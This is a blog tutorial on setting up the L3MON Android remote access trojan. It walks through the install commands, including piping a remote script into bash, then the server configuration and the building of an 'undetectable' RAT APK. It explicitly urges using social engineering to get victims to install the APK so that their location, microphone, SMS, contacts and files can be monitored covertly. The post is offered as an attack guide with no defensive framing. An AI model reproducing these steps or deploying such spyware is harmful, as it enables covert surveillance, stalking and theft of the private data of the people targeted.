Skip to content

Hacking Android using L3MON

Published by Khan Suhail on May 15, 2020

What is L3MON ?

A cloud based remote android management suite, powered by NodeJS. It works on web client and generates a fully undetectable RAT .apk file.
Features :

  • GPS Logging
  • Microphone Recording
  • View Contacts
  • SMS Logs
  • Send SMS
  • Call Logs
  • View Installed Apps
  • View Stub Permissions
  • Live Clipboard Logging
  • Live Notification Logging
  • View WiFi Networks (logs previously seen)
  • File Explorer & Downloader
  • Command Queuing
  • Built In APK Builder

LETS GET STARTED

Before we download the tool from GitHub first we need to install the prerequisite files or setup.

Well first is JAVA so lets install it by entering following command in your CLI,

qirit0@ubuntu:~$ sudo apt install openjdk-8-jre-headless

You can download latest but at the same time install JRE-8 aswell else you might get errors while compiling the .apk and signing it. But i am using version 11, so far no problem !

qirit0@ubuntu:~$ java –version
openjdk 14.0.1 2020-04-14
OpenJDK Runtime Environment (build 14.0.1+7-Ubuntu-1ubuntu1)
OpenJDK 64-Bit Server VM (build 14.0.1+7-Ubuntu-1ubuntu1, mixed mode, sharing)

After Java its time for NodeJS as L3MON is based on NodeJS environment.
Just type the following command in terminal and NodeJS will get installed without any hassle

qirit0@ubuntu:~$ sudo apt install nodejs -y

Once done with NodeJS lets have npm installed aswell,

qirit0@ubuntu:~$ sudo apt install npm -y

Now, head towards my Github repository /Die-Dimitry/L3MON and copy the URL. Follow the below commands respectively to clone the repository, install server files and to install PM2.

qirit0@ubuntu:~$ git clone https://github.com/die-dimitry/L3MON
qirit0@ubuntu:~$ cd L3MON/server
qirit0@ubuntu:~/L3MON/server$ sudo npm install
qirit0@ubuntu:~/L3MON/server$ sudo wget -qO- https://getpm2.com/install.sh | bash

Installing these dependencies shouldn’t be pain but if you face any errors then you can visit their official website and get the solution for your errors OR drop them in comments i’ll try to resolve them for you.

Now its time to start the server and to do that you run the following command in your CLI.

qirit0@ubuntu:~/L3MON/server$ sudo pm2 start index.js

OK. After you start the server you need to shut it down using command,

qirit0@ubuntu:~/L3MON/server$ sudo pm2 stop index.js
qirit0@ubuntu:~/L3MON/server$ sudo gedit maindb.json

We Shut down the server file because we are going to edit the file name ‘maindb.json’ which appeared in /L3MON/server after we compiled all the files. To edit it you need to open the file via Gedit or Vim or Notepad or whatever editor you have. I am using Gedit.

Once you open the ‘maindb’ file change the username as per your fit.
For password you can not store it in simple form of simple Text, you have to generate MD5 hash for your password and paste those Hashes under password section.

To generate the MD5 Hash for your password visit MD5 Hash Generator.

Enter your password and Click on Generate.
After clicking on Generate you get Hashes as such
Your Hash: ‘2fef33ddc72f0dcf4d64d4efe88b850f‘ Bold text is hash for your password.
Copy it and paste it in ‘maindb.json’ File and save the File.

You can see in above picture How the .json file was before and later how i changed the content.

Now you’re good to go. So again start the server using same command and open the panel in your browser by entering your local IP followed by port 22533

qirit0@ubuntu:~/L3MON/server$ sudo pm2 start index.js

To know your IP you can simply use; ‘ifconfig‘ in the Terminal.

Be sure to use the same username as per from your ‘maindb.json’ File and under Password don’t use the hash file use plain text password which you used for generating your MD5 Hash.

After getting Logged in you’ll have an empty dashboard with Zero device hacked as of now. It will get filled with devices later once you have hacked them successfully using the RAT.

Lets move on to generate the RAT:

  1. Click on APK Builder from tab bar.
  2. Enter the IPaddress of your system. Just copy & paste from the URL of your Browser.
  3. Don’t change the Port.
  4. Click on Build.

Your file will get ready in a minute so just download it and have your victim install it in his phone.
There are tons of Social Engineering tricks which you can use and your victim will barely have any chance to suspect.

After L3MON.apk RAT file is installed in your Victims phone you will get the Device name in your Dashboard which was empty a while before.
You can install this RAT to ‘n’ number of devices and all the Phone will get listed in the Dashboard.

Click on Manage which is in front of Device name and you’ll be able to get all the real time data of the device.

Following snaps i can upload showing what all you can do

Hope You Enjoyed the Blog.
😁

Published inAndroid Hacking

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *